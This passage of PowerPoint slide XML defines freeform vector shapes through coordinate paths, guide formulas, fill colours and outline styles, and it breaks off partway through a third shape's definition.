                  <a:gd name="T90" fmla="*/ 105 w 117"/>
                  <a:gd name="T91" fmla="*/ 46 h 135"/>
                  <a:gd name="T92" fmla="*/ 102 w 117"/>
                  <a:gd name="T93" fmla="*/ 60 h 135"/>
                  <a:gd name="T94" fmla="*/ 100 w 117"/>
                  <a:gd name="T95" fmla="*/ 69 h 135"/>
                  <a:gd name="T96" fmla="*/ 93 w 117"/>
                  <a:gd name="T97" fmla="*/ 74 h 135"/>
                  <a:gd name="T98" fmla="*/ 84 w 117"/>
                  <a:gd name="T99" fmla="*/ 81 h 135"/>
                  <a:gd name="T100" fmla="*/ 78 w 117"/>
                  <a:gd name="T101" fmla="*/ 92 h 135"/>
                  <a:gd name="T102" fmla="*/ 77 w 117"/>
                  <a:gd name="T103" fmla="*/ 104 h 135"/>
                  <a:gd name="T104" fmla="*/ 77 w 117"/>
                  <a:gd name="T105" fmla="*/ 114 h 135"/>
                  <a:gd name="T106" fmla="*/ 67 w 117"/>
                  <a:gd name="T107" fmla="*/ 122 h 135"/>
                  <a:gd name="T108" fmla="*/ 56 w 117"/>
                  <a:gd name="T109" fmla="*/ 131 h 135"/>
                  <a:gd name="T110" fmla="*/ 51 w 117"/>
                  <a:gd name="T111" fmla="*/ 132 h 135"/>
                  <a:gd name="T112" fmla="*/ 51 w 117"/>
                  <a:gd name="T113" fmla="*/ 124 h 135"/>
                  <a:gd name="T114" fmla="*/ 38 w 117"/>
                  <a:gd name="T115" fmla="*/ 132 h 135"/>
                  <a:gd name="T116" fmla="*/ 33 w 117"/>
                  <a:gd name="T117" fmla="*/ 134 h 135"/>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17"/>
                  <a:gd name="T178" fmla="*/ 0 h 135"/>
                  <a:gd name="T179" fmla="*/ 117 w 117"/>
                  <a:gd name="T180" fmla="*/ 135 h 135"/>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17" h="135">
                    <a:moveTo>
                      <a:pt x="30" y="131"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="131"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36413" name="Freeform 145"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2916" y="2888"/>
                <a:ext cx="117" cy="135"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 25 w 117"/>
                  <a:gd name="T1" fmla="*/ 127 h 135"/>
                  <a:gd name="T2" fmla="*/ 17 w 117"/>
                  <a:gd name="T3" fmla="*/ 132 h 135"/>
                  <a:gd name="T4" fmla="*/ 13 w 117"/>
                  <a:gd name="T5" fmla="*/ 134 h 135"/>
                  <a:gd name="T6" fmla="*/ 0 w 117"/>
                  <a:gd name="T7" fmla="*/ 118 h 135"/>
                  <a:gd name="T8" fmla="*/ 4 w 117"/>
                  <a:gd name="T9" fmla="*/ 114 h 135"/>
                  <a:gd name="T10" fmla="*/ 13 w 117"/>
                  <a:gd name="T11" fmla="*/ 111 h 135"/>
                  <a:gd name="T12" fmla="*/ 10 w 117"/>
                  <a:gd name="T13" fmla="*/ 108 h 135"/>
                  <a:gd name="T14" fmla="*/ 7 w 117"/>
                  <a:gd name="T15" fmla="*/ 101 h 135"/>
                  <a:gd name="T16" fmla="*/ 8 w 117"/>
                  <a:gd name="T17" fmla="*/ 97 h 135"/>
                  <a:gd name="T18" fmla="*/ 19 w 117"/>
                  <a:gd name="T19" fmla="*/ 94 h 135"/>
                  <a:gd name="T20" fmla="*/ 21 w 117"/>
                  <a:gd name="T21" fmla="*/ 87 h 135"/>
                  <a:gd name="T22" fmla="*/ 24 w 117"/>
                  <a:gd name="T23" fmla="*/ 85 h 135"/>
                  <a:gd name="T24" fmla="*/ 28 w 117"/>
                  <a:gd name="T25" fmla="*/ 90 h 135"/>
                  <a:gd name="T26" fmla="*/ 33 w 117"/>
                  <a:gd name="T27" fmla="*/ 95 h 135"/>
                  <a:gd name="T28" fmla="*/ 37 w 117"/>
                  <a:gd name="T29" fmla="*/ 93 h 135"/>
                  <a:gd name="T30" fmla="*/ 41 w 117"/>
                  <a:gd name="T31" fmla="*/ 92 h 135"/>
                  <a:gd name="T32" fmla="*/ 43 w 117"/>
                  <a:gd name="T33" fmla="*/ 96 h 135"/>
                  <a:gd name="T34" fmla="*/ 47 w 117"/>
                  <a:gd name="T35" fmla="*/ 96 h 135"/>
                  <a:gd name="T36" fmla="*/ 50 w 117"/>
                  <a:gd name="T37" fmla="*/ 84 h 135"/>
                  <a:gd name="T38" fmla="*/ 53 w 117"/>
                  <a:gd name="T39" fmla="*/ 67 h 135"/>
                  <a:gd name="T40" fmla="*/ 51 w 117"/>
                  <a:gd name="T41" fmla="*/ 64 h 135"/>
                  <a:gd name="T42" fmla="*/ 45 w 117"/>
                  <a:gd name="T43" fmla="*/ 62 h 135"/>
                  <a:gd name="T44" fmla="*/ 42 w 117"/>
                  <a:gd name="T45" fmla="*/ 57 h 135"/>
                  <a:gd name="T46" fmla="*/ 42 w 117"/>
                  <a:gd name="T47" fmla="*/ 54 h 135"/>
                  <a:gd name="T48" fmla="*/ 47 w 117"/>
                  <a:gd name="T49" fmla="*/ 49 h 135"/>
                  <a:gd name="T50" fmla="*/ 51 w 117"/>
                  <a:gd name="T51" fmla="*/ 43 h 135"/>
                  <a:gd name="T52" fmla="*/ 46 w 117"/>
                  <a:gd name="T53" fmla="*/ 34 h 135"/>
                  <a:gd name="T54" fmla="*/ 35 w 117"/>
                  <a:gd name="T55" fmla="*/ 38 h 135"/>
                  <a:gd name="T56" fmla="*/ 31 w 117"/>
                  <a:gd name="T57" fmla="*/ 36 h 135"/>
                  <a:gd name="T58" fmla="*/ 31 w 117"/>
                  <a:gd name="T59" fmla="*/ 25 h 135"/>
                  <a:gd name="T60" fmla="*/ 38 w 117"/>
                  <a:gd name="T61" fmla="*/ 23 h 135"/>
                  <a:gd name="T62" fmla="*/ 50 w 117"/>
                  <a:gd name="T63" fmla="*/ 23 h 135"/>
                  <a:gd name="T64" fmla="*/ 55 w 117"/>
                  <a:gd name="T65" fmla="*/ 23 h 135"/>
                  <a:gd name="T66" fmla="*/ 63 w 117"/>
                  <a:gd name="T67" fmla="*/ 25 h 135"/>
                  <a:gd name="T68" fmla="*/ 76 w 117"/>
                  <a:gd name="T69" fmla="*/ 30 h 135"/>
                  <a:gd name="T70" fmla="*/ 77 w 117"/>
                  <a:gd name="T71" fmla="*/ 23 h 135"/>
                  <a:gd name="T72" fmla="*/ 80 w 117"/>
                  <a:gd name="T73" fmla="*/ 20 h 135"/>
                  <a:gd name="T74" fmla="*/ 84 w 117"/>
                  <a:gd name="T75" fmla="*/ 12 h 135"/>
                  <a:gd name="T76" fmla="*/ 87 w 117"/>
                  <a:gd name="T77" fmla="*/ 2 h 135"/>
                  <a:gd name="T78" fmla="*/ 98 w 117"/>
                  <a:gd name="T79" fmla="*/ 0 h 135"/>
                  <a:gd name="T80" fmla="*/ 105 w 117"/>
                  <a:gd name="T81" fmla="*/ 1 h 135"/>
                  <a:gd name="T82" fmla="*/ 117 w 117"/>
                  <a:gd name="T83" fmla="*/ 0 h 135"/>
                  <a:gd name="T84" fmla="*/ 117 w 117"/>
                  <a:gd name="T85" fmla="*/ 2 h 135"/>
                  <a:gd name="T86" fmla="*/ 110 w 117"/>
                  <a:gd name="T87" fmla="*/ 17 h 135"/>
                  <a:gd name="T88" fmla="*/ 107 w 117"/>
                  <a:gd name="T89" fmla="*/ 26 h 135"/>
                  <a:gd name="T90" fmla="*/ 105 w 117"/>
                  <a:gd name="T91" fmla="*/ 46 h 135"/>
                  <a:gd name="T92" fmla="*/ 102 w 117"/>
                  <a:gd name="T93" fmla="*/ 60 h 135"/>
                  <a:gd name="T94" fmla="*/ 100 w 117"/>
                  <a:gd name="T95" fmla="*/ 69 h 135"/>
                  <a:gd name="T96" fmla="*/ 93 w 117"/>
                  <a:gd name="T97" fmla="*/ 74 h 135"/>
                  <a:gd name="T98" fmla="*/ 84 w 117"/>
                  <a:gd name="T99" fmla="*/ 81 h 135"/>
                  <a:gd name="T100" fmla="*/ 78 w 117"/>
                  <a:gd name="T101" fmla="*/ 92 h 135"/>
                  <a:gd name="T102" fmla="*/ 77 w 117"/>
                  <a:gd name="T103" fmla="*/ 104 h 135"/>
                  <a:gd name="T104" fmla="*/ 77 w 117"/>
                  <a:gd name="T105" fmla="*/ 114 h 135"/>
                  <a:gd name="T106" fmla="*/ 67 w 117"/>
                  <a:gd name="T107" fmla="*/ 122 h 135"/>
                  <a:gd name="T108" fmla="*/ 56 w 117"/>
                  <a:gd name="T109" fmla="*/ 131 h 135"/>
                  <a:gd name="T110" fmla="*/ 51 w 117"/>
                  <a:gd name="T111" fmla="*/ 132 h 135"/>
                  <a:gd name="T112" fmla="*/ 51 w 117"/>
                  <a:gd name="T113" fmla="*/ 124 h 135"/>
                  <a:gd name="T114" fmla="*/ 38 w 117"/>
                  <a:gd name="T115" fmla="*/ 132 h 135"/>
                  <a:gd name="T116" fmla="*/ 33 w 117"/>
                  <a:gd name="T117" fmla="*/ 134 h 135"/>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17"/>
                  <a:gd name="T178" fmla="*/ 0 h 135"/>
                  <a:gd name="T179" fmla="*/ 117 w 117"/>
                  <a:gd name="T180" fmla="*/ 135 h 135"/>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17" h="135">
                    <a:moveTo>
                      <a:pt x="30" y="131"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="131"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36414" name="Freeform 146"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1572" y="3300"/>
                <a:ext cx="316" cy="692"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 77 w 316"/>
                  <a:gd name="T1" fmla="*/ 643 h 692"/>
                  <a:gd name="T2" fmla="*/ 91 w 316"/>
                  <a:gd name="T3" fmla="*/ 655 h 692"/>
                  <a:gd name="T4" fmla="*/ 118 w 316"/>
